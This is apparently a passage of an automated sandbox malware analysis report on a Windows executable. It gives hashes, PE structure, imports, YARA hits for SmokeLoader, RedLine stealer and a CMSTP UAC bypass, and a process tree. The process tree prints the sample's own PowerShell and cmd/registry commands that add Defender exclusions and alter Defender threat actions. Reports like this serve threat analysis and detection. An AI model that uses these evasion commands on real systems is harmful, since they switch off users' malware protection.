                                                      SSDEEP:6144:/cifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuNb5+:ki58oSWIZBk2MM6AFBZo
                                                      MD5:9EF8A791C06E6FF3D0BF8B783B8DBA36
                                                      SHA1:3F082A336FEE7332E983E6289DE14F6D157504FC
                                                      SHA-256:4783236679BC3A652E69A7AD8A9B0A8A40A60D6750AB30BEC0F0CF6924055A09
                                                      SHA-512:6E74A79916443FFEA382864ED9E5275B41246A45A56EF3356DC5D08F58396E6E70987C449B6124AAA663FFD540CB2745E184EFD21B2FE2F613A7D12CB9580B93
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:regfF...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                      File Type:ASCII text, with CRLF, CR line terminators
                                                      Category:dropped
                                                      Size (bytes):80
                                                      Entropy (8bit):4.837326145256008
                                                      Encrypted:false
                                                      SSDEEP:3:YwM2F6ELdADAeGAMm96XyzGc7OS4Ql:Yw7663eG8FzGQR
                                                      MD5:C1028F4DC91171021CC811DEC5CBD173
                                                      SHA1:72358DE1D13924E08B33CE14A9D1E0BB0E04DFB1
                                                      SHA-256:8D4075306F058EFA27EBCCDA57983F28F196141049701D07E044B7EA17F21B12
                                                      SHA-512:72DC710CB1DE2D86121A7FAF4FE93D64B8A0FB9C9C7848A7A1ACA9BC429040CA8565C48861F53107A9709AAB2235DF6953AEF9282F382BE960344CD1E08735A9
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:Executing (MSFT_MpPreference)->Add()...ERROR:...Description = Generic failure...
                                                      File type:PE32+ executable (console) x86-64, for MS Windows
                                                      Entropy (8bit):6.796482233204677
                                                      TrID:
                                                      • Win64 Executable Console (202006/5) 92.65%
                                                      • Win64 Executable (generic) (12005/4) 5.51%
                                                      • Generic Win/DOS Executable (2004/3) 0.92%
                                                      • DOS Executable Generic (2002/1) 0.92%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:lgX7lgUL1w.exe
                                                      File size:1'843'424 bytes
                                                      MD5:7ff8c26a36f5a4566990745dff1594f3
                                                      SHA1:5d73bbd168fb9b1e43051340a415d95f28c40f4d
                                                      SHA256:fc44a0e8161907e73f2e7f0ee5b264a8e2c78f5af3437c4cb25341661da8d813
                                                      SHA512:d97be45d80e85722e74b44aeff834b2ccc219520c7d1632452c4a361b9dea59439f0f0ba27af6444132147c7bc30ccd5582bb0a0e246baf00f61e16195706b2d
                                                      SSDEEP:24576:jynjN3fi9dEoZR814OEQjls30eTFxmT4i8eMOq52eOXuq01dKqOF7:ujN3CdJ81nEQhs30eWuqsrOF7
                                                      TLSH:3F85BF05A3F801E4E46BC634CA599733D2B1B44A1730E5CB0A5AD7922F73EE15BBF612
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6c.IW._IW._IW._O..^EW._O..^XW._O..^gW._@/._GW._./.^BW._IW._IV._.+.^BW._.+.^.W._IW._KW._#..^HW._#.._HW._#..^HW._RichIW._.......
                                                      Icon Hash:00928e8e8686b000
                                                      Entrypoint:0x140068d5c
                                                      Entrypoint Section:.text
                                                      Digitally signed:true
                                                      Imagebase:0x140000000
                                                      Subsystem:windows cui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x664E7376 [Wed May 22 22:36:38 2024 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:6
                                                      OS Version Minor:0
                                                      File Version Major:6
                                                      File Version Minor:0
                                                      Subsystem Version Major:6
                                                      Subsystem Version Minor:0
                                                      Import Hash:79856d4b034c49dc3dd3e403b25b6bbf
                                                      Signature Valid:false
                                                      Signature Issuer:C=US, S=Washington, L=Redmond, OU=Microsoft Corporation, O=Microsoft Corporation, CN=Microsoft Code Signing PCA 2011
                                                      Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                      Error Number:-2146762487
                                                      Not Before, Not After
                                                      • 23/05/2024 19:17:17 23/05/2025 19:17:17
                                                      Subject Chain
                                                      • C=US, S=Washington, L=Redmond, OU=Microsoft Corporation, O=Microsoft Corporation, CN=Microsoft Code Signing PCA 2011
                                                      Version:3
                                                      Thumbprint MD5:28767EE17A41F8B246D245C0DFCC6F67
                                                      Thumbprint SHA-1:E476EF38785117EF57C4CAB10F0D116A2B266D5D
                                                      Thumbprint SHA-256:756AB42EEDEDD6ED3E697AFF8B1DE9449D59FD84B5244BE1E57ACB79F817C8CB
                                                      Serial:00D2294495B534277F8B0F619CBCD5AAB8
                                                      Instruction
                                                      dec eax
                                                      sub esp, 28h
                                                      call 00007F16010FC66Ch
                                                      dec eax
                                                      add esp, 28h
                                                      jmp 00007F16010FBF67h
                                                      int3
                                                      int3
                                                      inc eax
                                                      push ebx
                                                      dec eax
                                                      sub esp, 20h
                                                      dec eax
                                                      mov ebx, ecx
                                                      jmp 00007F16010FC101h
                                                      dec eax
                                                      mov ecx, ebx
                                                      call 00007F16011047A5h
                                                      test eax, eax
                                                      je 00007F16010FC105h
                                                      dec eax
                                                      mov ecx, ebx
                                                      call 00007F16010FBE17h
                                                      dec eax
                                                      test eax, eax
                                                      je 00007F16010FC0D9h
                                                      dec eax
                                                      add esp, 20h
                                                      pop ebx
                                                      ret
                                                      dec eax
                                                      cmp ebx, FFFFFFFFh
                                                      je 00007F16010FC0F8h
                                                      call 00007F16010FCAFCh
                                                      int3
                                                      call 00007F16010FCB16h
                                                      int3
                                                      jmp 00007F16010FCB44h
                                                      int3
                                                      int3
                                                      int3
                                                      jmp 00007F16010FC1ACh
                                                      int3
                                                      int3
                                                      int3
                                                      dec eax
                                                      sub esp, 28h
                                                      dec ebp
                                                      mov eax, dword ptr [ecx+38h]
                                                      dec eax
                                                      mov ecx, edx
                                                      dec ecx
                                                      mov edx, ecx
                                                      call 00007F16010FC102h
                                                      mov eax, 00000001h
                                                      dec eax
                                                      add esp, 28h
                                                      ret
                                                      int3
                                                      int3
                                                      int3
                                                      inc eax
                                                      push ebx
                                                      inc ebp
                                                      mov ebx, dword ptr [eax]
                                                      dec eax
                                                      mov ebx, edx
                                                      inc ecx
                                                      and ebx, FFFFFFF8h
                                                      dec esp
                                                      mov ecx, ecx
                                                      inc ecx
                                                      test byte ptr [eax], 00000004h
                                                      dec esp
                                                      mov edx, ecx
                                                      je 00007F16010FC105h
                                                      inc ecx
                                                      mov eax, dword ptr [eax+08h]
                                                      dec ebp
                                                      arpl word ptr [eax+04h], dx
                                                      neg eax
                                                      dec esp
                                                      add edx, ecx
                                                      dec eax
                                                      arpl ax, cx
                                                      dec esp
                                                      and edx, ecx
                                                      dec ecx
                                                      arpl bx, ax
                                                      dec edx
                                                      mov edx, dword ptr [eax+edx]
                                                      dec eax
                                                      mov eax, dword ptr [ebx+10h]
                                                      mov ecx, dword ptr [eax+08h]
                                                      dec eax
                                                      mov eax, dword ptr [ebx+08h]
                                                      test byte ptr [ecx+eax+03h], 0000000Fh
                                                      je 00007F16010FC0FDh
                                                      movzx eax, byte ptr [ecx+eax+00h]
                                                      Programming Language:
                                                      • [IMP] VS2008 SP1 build 30729
                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x1f79a00x58.rdata
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x1f79f80xf0.rdata
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x21d0000x3160.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x2080000x1314c.pdata
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x1c08000x18e0.rdata
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x2210000x634.reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x1ca3700x1c.rdata
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x1ca5000x28.rdata
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1ca2300x140.rdata
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x17d0000x778.rdata
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x10000x71a880x71c005cdd54da137ec06542526019b1031732False0.4528288118131868data6.6410813091638IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .managed0x730000xb91680xb92002d30634d2eb96982ab12a2d431b95020False0.4601620526671168data6.463570386679756IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      hydrated0x12d0000x4f8080x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .rdata0x17d0000x7c4de0x7c60037a2c01a0ab62cee2056b2eb051c3620False0.46991794912060303data6.575379342716947IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .data0x1fa0000xdc900x22005c15d417ed4d359d82911c50efdabf9aFalse0.23793658088235295data3.6721787513471362IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .pdata0x2080000x1314c0x132008cc774a948808419be7ca4f4b39fb78dFalse0.4887280433006536data6.17164551981099IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      _RDATA0x21c0000x1f40x200cfc28b4453f40f4f91f4a52e36529a97False0.5078125data4.172727899540164IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .rsrc0x21d0000x31600x32006361392e2157b1871b4cabdc4cd09249False0.921171875data7.79427748045608IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc0x2210000x6340x8008b35b44373572aa9287a6c541ff3e534False0.48681640625data4.726579003687373IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                      BINARY0x21d11c0x2aa4data1.00100769512642
                                                      RT_VERSION0x21fbc00x3b4data0.3407172995780591
                                                      RT_MANIFEST0x21ff740x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                      DLLImport
                                                      ADVAPI32.dllRegCloseKey, RegEnumKeyExW, RegEnumValueW, RegOpenKeyExW, RegQueryValueExW, RegSetValueExW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegSetValueExA, GetTokenInformation, DuplicateTokenEx, OpenThreadToken, RevertToSelf, ImpersonateLoggedOnUser, CheckTokenMembership, EventWrite, EventRegister, EventEnabled
                                                      bcrypt.dllBCryptGenRandom, BCryptEncrypt, BCryptDecrypt, BCryptImportKey, BCryptOpenAlgorithmProvider, BCryptSetProperty, BCryptCloseAlgorithmProvider, BCryptDestroyKey
                                                      KERNEL32.dllTlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSectionAndSpinCount, EncodePointer, RaiseException, RtlPcToFileHeader, CloseThreadpoolIo, GetStdHandle, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToSystemTime, GetSystemTime, GetCalendarInfoEx, CompareStringOrdinal, CompareStringEx, FindNLSStringEx, GetLocaleInfoEx, ResolveLocaleName, GetUserPreferredUILanguages, FindStringOrdinal, GetTickCount64, GetCurrentProcess, GetCurrentThread, Sleep, InitializeCriticalSection, InitializeConditionVariable, DeleteCriticalSection, LocalFree, EnterCriticalSection, SleepConditionVariableCS, LeaveCriticalSection, WakeConditionVariable, QueryPerformanceCounter, WaitForMultipleObjectsEx, GetLastError, QueryPerformanceFrequency, SetLastError, GetFullPathNameW, GetLongPathNameW, MultiByteToWideChar, WideCharToMultiByte, LocalAlloc, GetConsoleOutputCP, GetProcAddress, RaiseFailFastException, CreateThreadpoolIo, StartThreadpoolIo, CancelThreadpoolIo, LocaleNameToLCID, LCMapStringEx, EnumTimeFormatsEx, EnumCalendarInfoExEx, CopyFileExW, CreateFileW, DeleteFileW, DeviceIoControl, ExpandEnvironmentStringsW, FindClose, FindFirstFileExW, FlushFileBuffers, FreeLibrary, GetFileAttributesExW, GetFileInformationByHandleEx, GetFileType, GetModuleFileNameW, GetOverlappedResult, GetSystemDirectoryW, LoadLibraryExW, ReadFile, SetFileInformationByHandle, SetThreadErrorMode, GetDynamicTimeZoneInformation, GetTimeZoneInformation, WriteFile, GetCurrentProcessorNumberEx, CloseHandle, SetEvent, CreateEventExW, GetEnvironmentVariableW, FormatMessageW, DuplicateHandle, GetThreadPriority, SetThreadPriority, GetConsoleMode, WriteConsoleW, GetExitCodeProcess, TerminateProcess, OpenProcess, K32EnumProcesses, GetProcessId, CreateProcessA, GetConsoleWindow, FreeConsole, AllocConsole, VirtualAllocEx, ResumeThread, CreateProcessW, GetThreadContext, SetThreadContext, FlushProcessWriteBuffers, GetCurrentThreadId, WaitForSingleObjectEx, VirtualQuery, RtlRestoreContext, AddVectoredExceptionHandler, FlsAlloc, FlsGetValue, FlsSetValue, CreateEventW, SwitchToThread, CreateThread, SuspendThread, FlushInstructionCache, VirtualAlloc, VirtualProtect, VirtualFree, QueryInformationJobObject, GetModuleHandleW, GetModuleHandleExW, GetProcessAffinityMask, InitializeContext, GetEnabledXStateFeatures, SetXStateFeaturesMask, InitializeCriticalSectionEx, GetSystemTimeAsFileTime, ResetEvent, DebugBreak, WaitForSingleObject, SleepEx, GlobalMemoryStatusEx, GetSystemInfo, GetLogicalProcessorInformation, GetLogicalProcessorInformationEx, GetLargePageMinimum, VirtualUnlock, VirtualAllocExNuma, IsProcessInJob, GetNumaHighestNodeNumber, GetProcessGroupAffinity, K32GetProcessMemoryInfo, RtlUnwindEx, IsProcessorFeaturePresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsDebuggerPresent, RtlVirtualUnwind, RtlLookupFunctionEntry, RtlCaptureContext, InitializeSListHead, GetCurrentProcessId
                                                      ole32.dllCoUninitialize, CoTaskMemAlloc, CoGetApartmentType, CoCreateGuid, CoTaskMemFree, CoWaitForMultipleHandles, CoInitializeEx
                                                      USER32.dllLoadStringW
                                                      api-ms-win-crt-math-l1-1-0.dllpow, modf, ceil, __setusermatherr
                                                      api-ms-win-crt-heap-l1-1-0.dllcalloc, malloc, _callnewh, _set_new_mode, free
                                                      api-ms-win-crt-string-l1-1-0.dllwcsncmp, strncpy_s, _stricmp, strcpy_s, strcmp, _wcsicmp
                                                      api-ms-win-crt-runtime-l1-1-0.dll_c_exit, _register_thread_local_exe_atexit_callback, _get_initial_wide_environment, _cexit, __p___wargv, __p___argc, _exit, exit, _initterm_e, _initterm, terminate, _crt_atexit, _initialize_wide_environment, _configure_wide_argv, _register_onexit_function, _initialize_onexit_table, _set_app_type, _seh_filter_exe, abort
                                                      api-ms-win-crt-stdio-l1-1-0.dll__stdio_common_vsprintf_s, __stdio_common_vsscanf, __stdio_common_vfprintf, __acrt_iob_func, _set_fmode, __p__commode
                                                      api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale
                                                      NameOrdinalAddress
                                                      DotNetRuntimeDebugHeader10x1401fb360
                                                      Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.

                                                      Click to jump to process

                                                      Click to jump to process

                                                      Click to dive into process behavior distribution

                                                      Click to jump to process

                                                      Target ID:0
                                                      Start time:05:28:56
                                                      Start date:24/05/2024
                                                      Path:C:\Users\user\Desktop\lgX7lgUL1w.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Users\user\Desktop\lgX7lgUL1w.exe"
                                                      Imagebase:0x7ff7e3570000
                                                      File size:1'843'424 bytes
                                                      MD5 hash:7FF8C26A36F5A4566990745DFF1594F3
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000000.1201842177.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1213051292.00000233C4D27000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:1
                                                      Start time:05:28:56
                                                      Start date:24/05/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff75da10000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:3
                                                      Start time:05:28:56
                                                      Start date:24/05/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath $env:UserProfile
                                                      Imagebase:0x7ff741d30000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:4
                                                      Start time:05:28:56
                                                      Start date:24/05/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff75da10000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:5
                                                      Start time:05:28:57
                                                      Start date:24/05/2024
                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                      Imagebase:0x5f0000
                                                      File size:43'008 bytes
                                                      MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:false

                                                      Target ID:7
                                                      Start time:05:29:01
                                                      Start date:24/05/2024
                                                      Path:C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe" /s
                                                      Imagebase:0x400000
                                                      File size:1'524'456 bytes
                                                      MD5 hash:CD4ACEDEFA9AB5C7DCCAC667F91CEF13
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:8
                                                      Start time:05:29:01
                                                      Start date:24/05/2024
                                                      Path:C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe"
                                                      Imagebase:0x400000
                                                      File size:223'744 bytes
                                                      MD5 hash:C5A6381354CD5D1488E362C9103C1851
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000008.00000002.1706196423.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000008.00000002.1769205035.000000000301B000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000008.00000002.1710200327.0000000002E20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000008.00000002.1710200327.0000000002E20000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000008.00000002.1731271507.0000000002F51000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000008.00000002.1731271507.0000000002F51000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:9
                                                      Start time:05:29:02
                                                      Start date:24/05/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                      Imagebase:0x7ff7b4ee0000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:10
                                                      Start time:05:29:02
                                                      Start date:24/05/2024
                                                      Path:C:\Windows\System32\SgrmBroker.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\SgrmBroker.exe
                                                      Imagebase:0x7ff6bcef0000
                                                      File size:329'504 bytes
                                                      MD5 hash:3BA1A18A0DC30A0545E7765CB97D8E63
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:11
                                                      Start time:05:29:02
                                                      Start date:24/05/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                      Imagebase:0x7ff7b4ee0000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:12
                                                      Start time:05:29:02
                                                      Start date:24/05/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                                                      Imagebase:0x7ff7b4ee0000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:13
                                                      Start time:05:29:02
                                                      Start date:24/05/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC
                                                      Imagebase:0x7ff7b4ee0000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:14
                                                      Start time:05:29:02
                                                      Start date:24/05/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                      Imagebase:0x7ff7b4ee0000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:16
                                                      Start time:05:29:03
                                                      Start date:24/05/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
                                                      Imagebase:0x7ff7b4ee0000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:18
                                                      Start time:05:29:04
                                                      Start date:24/05/2024
                                                      Path:C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe"
                                                      Imagebase:0x400000
                                                      File size:6'892'232 bytes
                                                      MD5 hash:53D14BD638C98C210E391151A8D3BCCC
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:19
                                                      Start time:05:29:04
                                                      Start date:24/05/2024
                                                      Path:C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe"
                                                      Imagebase:0x140000000
                                                      File size:6'923'264 bytes
                                                      MD5 hash:F0587649682207064554A2372966435D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:20
                                                      Start time:05:29:05
                                                      Start date:24/05/2024
                                                      Path:C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:.\Install.exe /odidum "385118" /S
                                                      Imagebase:0xd40000
                                                      File size:6'725'120 bytes
                                                      MD5 hash:220A02A940078153B4063F42F206087B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Antivirus matches:
                                                      • Detection: 75%, ReversingLabs
                                                      Has exited:false

                                                      Target ID:21
                                                      Start time:05:29:06
                                                      Start date:24/05/2024
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                      Imagebase:0x410000
                                                      File size:236'544 bytes
                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:22
                                                      Start time:05:29:06
                                                      Start date:24/05/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff75da10000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

